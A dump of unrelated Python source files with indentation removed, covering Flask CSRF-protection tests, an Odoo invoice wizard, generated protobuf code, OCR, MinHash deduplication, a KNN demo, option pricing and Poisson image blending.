d = (rel_points * np.expand_dims(normal, 0)).sum(-1)
included = np.logical_and(included, d >= 0)
return included
def get_clustering_colors(num_colors):
colors = [(0., 0., 0.)]
for i in range(num_colors):
colors.append(hsv_to_rgb(i / num_colors, 0.45, 0.8))
colors = np.array(colors)
return colors
|
python
|
from __future__ import with_statement
import re
import pytest
from flask import Flask
from blessed_extensions import csrf_token
from pg_discuss._compat import to_unicode
csrf_token_input = re.compile(
r'([0-9a-z#A-Z-\.]*)'
)
def get_csrf_token(data):
match = csrf_token_input.search(to_unicode(data))
assert match
return match.groups()[0]
def create_app():
app = Flask(__name__)
app.secret_key = "secret"
@app.route('/csrftoken', methods=['GET'])
def csrftoken():
return csrf_token.generate_csrf()
return app
@pytest.fixture
def app():
"""Fixture to create an app with CsrfTokenExt initialized.
Creates several views for testing.
"""
app = create_app()
app.config['SECRET_KEY'] = "a poorly kept secret."
csrf = csrf_token.CsrfTokenExt(app)
csrf.init_app(app)
app.client = app.test_client()
@app.route('/', methods=['GET', 'POST'])
def csrf_protected():
return 'protected'
@csrf.exempt
@app.route('/csrf-exempt', methods=['GET', 'POST'])
def csrf_exempt():
return 'exempt'
@csrf.exempt
@app.route('/csrf-protect-method', methods=['GET', 'POST'])
def csrf_protect_method():
csrf.protect()
return 'protected'
return app
def test_missing_secret_key(app):
app.config['SECRET_KEY'] = None
with app.test_request_context():
with pytest.raises(ValueError):
csrf_token.generate_csrf()
def test_invalid_csrf(app):
response = app.client.post("/", data={"name": "danny"})
assert response.status_code == 403
assert b'token missing' in response.data
def test_invalid_csrf2(app):
# tests with bad token
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': "9999999999999##test"}
)
assert response.status_code == 403
def test_invalid_csrf3(app):
# tests with bad token
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': "foo"}
)
assert response.status_code == 403
def test_invalid_secure_csrf3(app):
# test with multiple separators
response = app.client.post(
"/",
data={"name": "danny"},
# will work only if greater than time.time()
base_url='https://localhost/',
)
assert response.status_code == 403
def test_valid_csrf(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': token},
base_url='https://localhost/',
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
)
assert b'protected' in response.data
def test_invalid_secure_csrf(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': token},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'failed' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://example.com/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'http://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost:3000/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
def test_valid_secure_csrf(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 200
def test_valid_csrf_method(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/csrf-protect-method",
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
)
assert response.status_code == 200
def test_invalid_csrf_method(app):
response = app.client.post("/csrf-protect-method", data={"name": "danny"})
assert response.status_code == 403
response = app.client.post("/", data={"name": "danny"})
assert response.status_code == 403
assert b'token missing' in response.data
def test_empty_csrf_headers(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
app.config['CSRF_TOKEN_HEADERS'] = list()
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
def test_custom_csrf_headers(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
app.config['CSRF_TOKEN_HEADERS'] = ['X-XSRF-TOKEN']
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-XSRF-TOKEN': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 200
def test_not_endpoint(app):
response = app.client.post('/not-endpoint')
assert response.status_code == 404
def test_testing(app):
app.testing = True
app.client.post("/", data={"name": "danny"})
def test_csrf_exempt(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/csrf-exempt",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
)
assert b'exempt' in response.data
def test_validate_csrf(app):
with app.test_request_context():
assert not csrf_token.validate_csrf('ff##dd')
token = csrf_token.generate_csrf()
assert csrf_token.validate_csrf(token)
def test_validate_not_expiring_csrf(app):
with app.test_request_context():
token = csrf_token.generate_csrf(time_limit=False)
assert csrf_token.validate_csrf(token, time_limit=False)
def test_csrf_check_default_false():
"""This test does not use the app fixture, since we need to change
a setting that is used in initialization of the extension.
"""
app = create_app()
app.config['CSRF_TOKEN_CHECK_DEFAULT'] = False
app.config['SECRET_KEY'] = "a poorly kept secret."
csrf = csrf_token.CsrfTokenExt(app)
csrf.init_app(app)
app.client = app.test_client()
@app.route('/foo', methods=['GET', 'POST'])
def csrf_protected2():
return 'protected'
response = app.client.post("/foo", data={"name": "danny"})
assert response.status_code == 200
|
python
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in root directory
##############################################################################
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
class AccountPaymentGroupInvoiceWizard(models.TransientModel):
_name = "account.payment.group.invoice.wizard"
_description = "account.payment.group.invoice.wizard"
@api.model
def default_payment_group(self):
return self.env['account.payment.group'].browse(
self._context.get('active_id', False))
payment_group_id = fields.Many2one(
'account.payment.group',
default=default_payment_group,
ondelete='cascade',
required=True,
)
journal_id = fields.Many2one(
'account.journal',
'Journal',
required=True,
ondelete='cascade',
)
invoice_date = fields.Date(
string='Refund Date',
default=fields.Date.context_today,
required=True
)
currency_id = fields.Many2one(
related='payment_group_id.currency_id',
)
date = fields.Date(
string='Accounting Date'
)
product_id = fields.Many2one(
'product.product',
required=True,
domain=[('sale_ok', '=', True)],
)
tax_ids = fields.Many2many(
'account.tax',
string='Taxes',
)
amount_untaxed = fields.Monetary(
string='Untaxed Amount',
required=True,
compute='_compute_amount_untaxed',
inverse='_inverse_amount_untaxed',
)
# we make amount total the main one and the other computed because the
# normal case of use would be to know the total amount and also this amount
# is the suggested one on creating the wizard
amount_total = fields.Monetary(
string='Total Amount',
required=True
)
description = fields.Char(
string='Reason',
)
company_id = fields.Many2one(
related='payment_group_id.company_id',
)
account_analytic_id = fields.Many2one(
'account.analytic.account',
'Analytic Account',
)
@api.onchange('product_id')
def change_product(self):
self.ensure_one()
if self.payment_group_id.partner_type == 'supplier':
taxes = self.product_id.supplier_taxes_id
else:
taxes = self.product_id.taxes_id
company = self.company_id or self.env.company
taxes = taxes.filtered(lambda r: r.company_id == company)
self.tax_ids = self.payment_group_id.partner_id.with_context(
force_company=company.id).property_account_position_id.map_tax(
taxes)
@api.onchange('amount_untaxed', 'tax_ids')
def _inverse_amount_untaxed(self):
self.ensure_one()
if self.tax_ids:
taxes = self.tax_ids.compute_all(
self.amount_untaxed, self.company_id.currency_id, 1.0,
product=self.product_id,
partner=self.payment_group_id.partner_id)
self.amount_total = taxes['total_included']
else:
self.amount_total = self.amount_untaxed
@api.depends('tax_ids', 'amount_total')
def _compute_amount_untaxed(self):
"""
For now we implement inverse only for percent taxes. We could extend to
other by simulating tax.price_include = True, computing tax and
then restoring tax.price_include = False.
"""
self.ensure_one()
tax_percent = 0.0
for tax in self.tax_ids.filtered(
lambda x: not x.price_include):
if tax.amount_type == 'percent':
tax_percent += tax.amount
elif tax.amount_type == 'partner_tax':
# ugly compatibility with l10n_ar l10n_ar_account_withholding
tax_percent += tax.get_partner_alicuot(
self.payment_group_id.partner_id,
fields.Date.context_today(self)).alicuota_percepcion
else:
raise ValidationError(_(
'You can only set amount total if taxes are of type '
'percentage'))
total_percent = (1 + tax_percent / 100) or 1.0
self.amount_untaxed = self.amount_total / total_percent
@api.onchange('payment_group_id')
def change_payment_group(self):
journal_type = 'sale'
type_tax_use = 'sale'
if self.payment_group_id.partner_type == 'supplier':
journal_type = 'purchase'
type_tax_use = 'purchase'
journal_domain = [
('type', '=', journal_type),
('company_id', '=', self.payment_group_id.company_id.id),
]
tax_domain = [
('type_tax_use', '=', type_tax_use),
('company_id', '=', self.payment_group_id.company_id.id)]
self.journal_id = self.env['account.journal'].search(
journal_domain, limit=1)
# usually debit/credit note will be for the payment difference
self.amount_total = abs(self.payment_group_id.payment_difference)
return {'domain': {
'journal_id': journal_domain,
'tax_ids': tax_domain,
}}
def get_invoice_vals(self):
self.ensure_one()
payment_group = self.payment_group_id
if payment_group.partner_type == 'supplier':
invoice_type = 'in_'
else:
invoice_type = 'out_'
if self._context.get('refund'):
invoice_type += 'refund'
else:
invoice_type += 'invoice'
return {
'invoice_payment_ref': self.description,
'date': self.date,
'invoice_date': self.invoice_date,
'invoice_origin': _('Payment id %s') % payment_group.id,
'journal_id': self.journal_id.id,
'invoice_user_id': payment_group.partner_id.user_id.id,
'partner_id': payment_group.partner_id.id,
'type': invoice_type,
}
def confirm(self):
self.ensure_one()
self = self.with_context(company_id=self.company_id.id, force_company=self.company_id.id)
invoice_vals = self.get_invoice_vals()
line_vals = {
'product_id': self.product_id.id,
'price_unit': self.amount_untaxed,
'tax_ids': [(6, 0, self.tax_ids.ids)],
}
if self.account_analytic_id:
line_vals['analytic_account_id'] = self.account_analytic_id.id
invoice_vals['invoice_line_ids'] = [(0, 0, line_vals)]
invoice = self.env['account.move'].create(invoice_vals)
invoice.action_post()
self.payment_group_id.to_pay_move_line_ids += (invoice.open_move_line_ids)
|
python
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: helloworld.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from nrpc import nrpc_pb2 as nrpc_dot_nrpc__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="helloworld.proto",
package="helloworld",
syntax="proto3",
serialized_options=b"\n\033io.grpc.examples.helloworldB\017HelloWorldProtoP\001",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x10helloworld.proto\x12\nhelloworld\x1a\x0fnrpc/nrpc.proto"\x1c\n\x0cHelloRequest\x12\x0c\n\x04name\x18\x01 \x01(\t"E\n\nHelloReply\x12\x10\n\x06result\x18\x01 \x01(\tH\x00\x12\x1c\n\x05\x65rror\x18\x02 \x01(\x0b\x32\x0b.nrpc.ErrorH\x00\x42\x07\n\x05reply2I\n\x07Greeter\x12>\n\x08SayHello\x12\x18.helloworld.HelloRequest\x1a\x16.helloworld.HelloReply"\x00\x42\x30\n\x1bio.grpc.examples.helloworldB\x0fHelloWorldProtoP\x01\x62\x06proto3',
dependencies=[
nrpc_dot_nrpc__pb2.DESCRIPTOR,
],
)
_HELLOREQUEST = _descriptor.Descriptor(
name="HelloRequest",
full_name="helloworld.HelloRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="helloworld.HelloRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=49,
serialized_end=77,
)
_HELLOREPLY = _descriptor.Descriptor(
name="HelloReply",
full_name="helloworld.HelloReply",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="result",
full_name="helloworld.HelloReply.result",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="error",
full_name="helloworld.HelloReply.error",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="reply",
full_name="helloworld.HelloReply.reply",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=79,
serialized_end=148,
)
_HELLOREPLY.fields_by_name["error"].message_type = nrpc_dot_nrpc__pb2._ERROR
_HELLOREPLY.oneofs_by_name["reply"].fields.append(_HELLOREPLY.fields_by_name["result"])
_HELLOREPLY.fields_by_name["result"].containing_oneof = _HELLOREPLY.oneofs_by_name[
"reply"
]
_HELLOREPLY.oneofs_by_name["reply"].fields.append(_HELLOREPLY.fields_by_name["error"])
_HELLOREPLY.fields_by_name["error"].containing_oneof = _HELLOREPLY.oneofs_by_name[
"reply"
]
DESCRIPTOR.message_types_by_name["HelloRequest"] = _HELLOREQUEST
DESCRIPTOR.message_types_by_name["HelloReply"] = _HELLOREPLY
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HelloRequest = _reflection.GeneratedProtocolMessageType(
"HelloRequest",
(_message.Message,),
{
"DESCRIPTOR": _HELLOREQUEST,
"__module__": "helloworld_pb2"
# @@protoc_insertion_point(class_scope:helloworld.HelloRequest)
},
)
_sym_db.RegisterMessage(HelloRequest)
HelloReply = _reflection.GeneratedProtocolMessageType(
"HelloReply",
(_message.Message,),
{
"DESCRIPTOR": _HELLOREPLY,
"__module__": "helloworld_pb2"
# @@protoc_insertion_point(class_scope:helloworld.HelloReply)
},
)
_sym_db.RegisterMessage(HelloReply)
DESCRIPTOR._options = None
_GREETER = _descriptor.ServiceDescriptor(
name="Greeter",
full_name="helloworld.Greeter",
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=150,
serialized_end=223,
methods=[
_descriptor.MethodDescriptor(
name="SayHello",
full_name="helloworld.Greeter.SayHello",
index=0,
containing_service=None,
input_type=_HELLOREQUEST,
output_type=_HELLOREPLY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
],
)
_sym_db.RegisterServiceDescriptor(_GREETER)
DESCRIPTOR.services_by_name["Greeter"] = _GREETER
# @@protoc_insertion_point(module_scope)
|
python
|
# extract text from a img and its coordinates using the pytesseract module
import cv2
import pytesseract
# You need to add tesseract binary dependency to system variable for this to work
img =cv2.imread('img.png')
#We need to convert the img into RGB format
img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
hI,wI,k=img.shape
print(pytesseract.image_to_string(img))
boxes=pytesseract.image_to_boxes(img)
for b in boxes.splitlines():
b=b.split(' ')
x,y,w,h=int(b[1]),int(b[2]),int(b[3]),int(b[4])
cv2.rectangle(img,(x,hI-y),(w,hI-h),(0,0,255),0.2)
cv2.imshow('img',img)
cv2.waitKey(0)
|
python
|
from cwr_admin.resources.cwr import CWRFilesResource, CWRProcessorResource, \
CWRMatchResultResource, CWRFilesRemoveResource, CWRMatchBeginResource, \
CWRMatchRejectResource, CWRMatchAcceptResource, CWRMatchFeedbackResource
|
python
|
# This code is based on https://github.com/Ryo-Ito/spatial_transformer_network
import tensorflow as tf
def mgrid(*args, **kwargs):
low = kwargs.pop("low", -1)
high = kwargs.pop("high", 1)
low = tf.to_float(low)
high = tf.to_float(high)
coords = (tf.linspace(low, high, arg) for arg in args)
grid = tf.stack(tf.meshgrid(*coords, indexing='ij'))
return grid
def batch_mgrid(n_batch, *args, **kwargs):
grid = mgrid(*args, **kwargs)
grid = tf.expand_dims(grid, 0)
grids = tf.tile(grid, [n_batch] + [1 for _ in range(len(args) + 1)])
return grids
|
python
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
#
# Unit tests for test reports.
import inspect
import os
import unittest
from curie.node_failure_test.node_failure_test import NodeFailureTest
from curie.node_failure_data_loss_test.node_failure_data_loss_test \
import NodeFailureDataLossTest
from curie.oltp_dss_test.oltp_dss_test import OltpDssTest
from curie.oltp_vdi_test.oltp_vdi_test import OltpVdiTest
from curie.oltp_snapshot_test.oltp_snapshot_test import OltpSnapshotTest
from curie.rolling_upgrade_test.rolling_upgrade_test import RollingUpgradeTest
# Top directory of repository.
TOP = os.path.realpath("%s/../../" %
os.path.abspath(
os.path.dirname(
os.path.abspath(globals()["__file__"]))))
MODULE_NAME = inspect.getmodulename(__file__)
# -----------------------------------------------------------------------------
def module_output_dir():
if "TESTOUTDIR" in os.environ:
return os.environ["TESTOUTDIR"]
else:
return os.path.join(TOP, "build", "testoutput", "curie", "pytest",
"%s.py" % MODULE_NAME)
class TestTestReport(unittest.TestCase):
def setUp(self):
self.__data_dir = os.path.abspath(os.path.join(".",
"resource/reporting_test"))
self.__output_dir = module_output_dir()
if not os.path.exists(self.__output_dir):
os.makedirs(self.__output_dir)
def test_ntnx_oltp_dss_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_dss")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_dss")
OltpDssTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_oltp_vdi_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_vdi")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_vdi")
OltpVdiTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_oltp_snapshot_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_snapshot")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_snapshot")
OltpSnapshotTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_node_failure_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "node_failure")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "node_failure")
NodeFailureTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_rolling_upgrade_report(self):
test_output_dir = os.path.join(
self.__output_dir, "ntnx", "rolling_upgrade")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "rolling_upgrade")
RollingUpgradeTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_node_failure_data_loss_report(self):
test_output_dir = os.path.join(
self.__output_dir, "ntnx", "node_failure_data_loss")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "node_failure_data_loss")
NodeFailureDataLossTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-07-24 11:30:23
# @Author : Chenghao Mou ([email protected])
from typing import List
from datasketch import MinHash, MinHashLSH
from nltk.util import ngrams
from text_dedup.utils.group import get_group_indices
import multiprocessing as mp
import time
class MinHashDeduper:
def __init__(self, num_perm: int = 128, threshold: float = 0.5, ngram_size: int = 5):
self.num_perm = num_perm
self.threshold = threshold
self.ngram_size = ngram_size
self.lsh = None
def fit_transform(self, data: List[str]) -> List[int]:
"""Group similar documents with minhash.
Parameters
----------
data : List[str]
List of document strings.
Returns
-------
List[int]
List of group indices.
Examples
--------
>>> deduper = MinHashDeduper(ngram_size=5, threshold=0.3)
>>> groups = deduper.fit_transform(["This is a sentence.", "This is another sentence.", "This is a question.", "hello world"])
>>> groups
[0, 0, 2, 3]
"""
self.lsh = MinHashLSH(threshold=self.threshold, num_perm=self.num_perm)
signatures = []
for i, doc in enumerate(data):
m = MinHash(num_perm=self.num_perm)
for ngram in ngrams(doc, self.ngram_size):
m.update(''.join(ngram).encode('utf-8'))
signatures.append(m)
self.lsh.insert(f'm{i}', m)
neighbors = []
for i, doc in enumerate(data):
result = self.lsh.query(signatures[i])
neighbors.append([int(x[1:]) for x in result])
return get_group_indices(neighbors)
def fit_transform_parallel(self, data: List[str]) -> List[int]:
"""Group similar documents with minhash.
Parameters
----------
data : List[str]
List of document strings.
Returns
-------
List[int]
List of group indices.
Examples
--------
>>> deduper = MinHashDeduper(ngram_size=5, threshold=0.3)
>>> groups = deduper.fit_transform(["This is a sentence.", "This is another sentence.", "This is a question.", "hello world"])
>>> groups
[0, 0, 2, 3]
"""
pool = mp.Pool(mp.cpu_count())
self.lsh = MinHashLSH(threshold=self.threshold, num_perm=self.num_perm)
signatures = [pool.apply_async(_create_signature, args=(self.num_perm, self.ngram_size, doc)) for doc in data]
for i, m in enumerate(signatures):
signatures[i] = m.get()
for i, m in enumerate(signatures):
self.lsh.insert(f'm{i}', m)
# Does not work for some reason, although it does not affect performance that much
# query_results = [pool.apply_async(self.lsh.query, args=(s)) for s in signatures]
# for i, qr in enumerate(query_results):
# query_results[i] = qr.get()
neighbors = []
for i, doc in enumerate(data):
result = self.lsh.query(signatures[i])
# result = query_results[i]
neighbors.append([int(x[1:]) for x in result])
pool.close()
pool.join()
return get_group_indices(neighbors)
def _create_signature(num_perm, ngram_size, doc):
m = MinHash(num_perm=num_perm)
for ngram in ngrams(doc, ngram_size):
m.update(''.join(ngram).encode('utf-8'))
return m
|
python
|
from .binary_tree import *
|
python
|
# -*- coding: utf-8 -*-
# KNN.py
import numpy as np
import matplotlib.pyplot as plt
import cv2
if __name__ == '__main__':
# 记住numpy的array有下面这种神器的用法
test = np.array([1,-2,3,-4,5])
res = test[test > 0]
# res = [1,3,5]
a = np.random.randint(0,101,(50,2),dtype=np.int64).astype(np.float32)
flag = np.random.randint(0,2,(50,1),dtype = np.int64).astype(np.float32)
red = a[flag.ravel() == 0]
blue = a[flag.ravel() == 1]
plt.figure
plt.scatter(red[:,0],red[:,1],40,'r')
plt.scatter(blue[:,0],blue[:,1],40,'b','<')
newcomer = np.random.randint(0,101,(1,2),dtype=np.int64).astype(np.float32)
# draw a cycle
r = 20
theta = np.arange(0, 2*np.pi, 0.01)
x = newcomer[0,0] + r * np.cos(theta)
y = newcomer[0,1] + r * np.sin(theta)
plt.plot(x, y,'r-')
plt.axis('tight')
plt.scatter(newcomer[:,0],newcomer[:,1],40,'g','>')
knn = cv2.ml.KNearest_create()
knn.train(a,cv2.ml.ROW_SAMPLE,flag)
ret,results,neighbours,dist = knn.findNearest(newcomer,5)
print('ret= ',ret)
print('results=',results)
print('neighbours=',neighbours)
print('dist=',dist)
plt.show()
|
python
|
"""
This is comment section
"""
def display_hello_world():
"""
This is a function to display "Hello World!"
:return: void
"""
print("Hello World!")
display_hello_world()
# Set text
texts = ["Hello", "World", "!"]
for text in texts:
print(text)
numberString = "917254"
for char in numberString:
number = int(char, 10)
if number > 5:
print("The number ", number, " is greater than 5.")
elif 5 == number:
print("The number is 5.")
else:
print("The number ", number, " is less than 5.")
print("End")
|
python
|
import xmltodict
import defusedxml.ElementTree as ET
class Locations:
"""Provides lookup of raw location data based on UKPRN and LOCID"""
def __init__(self, root):
"""Build the locations lookup table
Locations are unique on UKPRN and LOCID
"""
self.lookup_dict = {}
for location in root.iter("LOCATION"):
raw_location_data = xmltodict.parse(ET.tostring(location))[
"LOCATION"
]
lockey = (
f"{raw_location_data['LOCID']}{raw_location_data['UKPRN']}"
)
self.lookup_dict[lockey] = raw_location_data
def get_location_data_for_key(self, key):
return self.lookup_dict.get(key)
|
python
|
from django.urls import path
from apps.contents.views import IndexView
urlpatterns = [
path('index/', IndexView.as_view()),
]
|
python
|
import numpy as np
from data.external_data.maturities import convert_maturity
from data.external_data.yahoo import Yahoo
from data.local_data.parameters_generator import ParametersGenerator
from stochastic_process.markov_chain import MarkovChain, Sigma
from stochastic_process.risky_asset import RiskyAsset
class DataGenerator:
number_of_S_paths = 1000
r = 0.05
def __init__(self, asset: Yahoo, data_size, number_of_states, *args: ParametersGenerator):
self.asset = asset
self.data_size = data_size
self.number_of_states = number_of_states
self.parameters = [arg.generate(
data_size, number_of_states) for arg in args]
self.S_0 = asset.current_asset_price
def generate_y_train(self):
axis = 1 if self.data_size > 1 else 0
return np.concatenate(self.parameters, axis=axis)
@property
def number_of_calls(self):
count = 0
for maturity in self.asset.maturities:
for K in self.asset.call_options_data[maturity]['strike']:
count += 1
return count
def generate_x_real(self):
prices = []
for maturity in self.asset.maturities:
for last_price in self.asset.call_options_data[maturity]['lastPrice']:
prices.append(last_price)
return np.array(prices).reshape((self.number_of_calls,))
def generate_x_train(self):
prices = []
for sigma, transition_coefficients in zip(*self.parameters):
X = MarkovChain(*transition_coefficients)
S = RiskyAsset(self.S_0)
for maturity in self.asset.maturities:
T = convert_maturity(maturity)
length_of_S_paths = int(np.round(T, 3)*1000)
delta_t = np.linspace(0, T, length_of_S_paths)[1]
random_sample = np.random.rand(
self.number_of_S_paths, length_of_S_paths - 1)
X_paths = X.paths(random_sample, delta_t)
sigma_paths = Sigma(*sigma).paths(X_paths)
S_paths = S.paths(delta_t, sigma_paths, self.r)
S_T = S_paths[:, -1]
strikes = self.asset.call_options_data[maturity]['strike'].to_numpy(
)
for K in strikes:
prices.append(np.exp(-self.r * T) *
np.maximum(S_T - K, 0).mean())
return np.array(prices).reshape((self.data_size, self.number_of_calls))
|
python
|
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from scipy.sparse.linalg import spsolve
def fix_source(source, mask, shape, offset):
mydict = {}
counter = 0
for i in range(mask.shape[0]):
for j in range(mask.shape[1]):
if mask[i][j]>127:
mydict[(i+offset[0], j+offset[1])] = counter
counter += 1
fixed_source = np.zeros(shape, dtype=int) #use int to avoid overflow
fixed_source[max(0, offset[0]):min(source.shape[0]+offset[0], shape[0]), max(0, offset[1]):min(source.shape[1]+offset[1],shape[1]),:]=source[max(0,-offset[0]):min(source.shape[0], shape[0]-offset[0]),max(0,-offset[1]):min(source.shape[1], shape[1]-offset[1]),:]
return fixed_source, mydict
offset = [[210, 10], [10, 28], [140, 80], [-40, 90], [60, 100], [-28, 88]]
for pic_index in range(1, 6):
mask = cv2.imread("../data/mask_0{0}.jpg".format(pic_index), 0)
source = cv2.imread("../data/source_0{0}.jpg".format(pic_index))
target = cv2.imread("../data/target_0{0}.jpg".format(pic_index))
fixed_source, D = fix_source(source, mask, target.shape, offset[pic_index-1]) #fixed source, same size with target
A = np.zeros((len(D),len(D)), dtype=int)
b = np.zeros((len(D),3), dtype=int)
for k, v in D.items():
A[v][v] = 4
b[v] += 4*fixed_source[k[0]][k[1]] \
- fixed_source[k[0]+1][k[1]] \
- fixed_source[k[0]-1][k[1]] \
- fixed_source[k[0]][k[1]+1] \
- fixed_source[k[0]][k[1]-1]
if (k[0]+1, k[1]) in D: # in D means this pixel is waiting to be calculated
A[v][D[(k[0]+1, k[1])]] = -1
else:
b[v] += target[k[0]+1][k[1]]
if (k[0]-1, k[1]) in D:
A[v][D[(k[0]-1, k[1])]] = -1
else:
b[v] += target[k[0]-1][k[1]]
if (k[0], k[1]+1) in D:
A[v][D[(k[0], k[1]+1)]] = -1
else:
b[v] += target[k[0]][k[1]+1]
if (k[0], k[1]-1) in D:
A[v][D[(k[0], k[1]-1)]] = -1
else:
b[v] += target[k[0]][k[1]-1]
x = spsolve(A, b)
for k, v in D.items():
if x[v][0]>255:
target[k[0]][k[1]][0] = np.uint8(255)
elif x[v][0]<0:
target[k[0]][k[1]][0] = np.uint8(0)
else:
target[k[0]][k[1]][0] = np.uint8(round(x[v][0]))
if x[v][1]>255:
target[k[0]][k[1]][1] = np.uint8(255)
elif x[v][1]<0:
target[k[0]][k[1]][1] = np.uint8(0)
else:
target[k[0]][k[1]][1] = np.uint8(round(x[v][1]))
if x[v][2]>255:
target[k[0]][k[1]][2] = np.uint8(255)
elif x[v][2]<0:
target[k[0]][k[1]][2] = np.uint8(0)
else:
target[k[0]][k[1]][2] = np.uint8(round(x[v][2]))
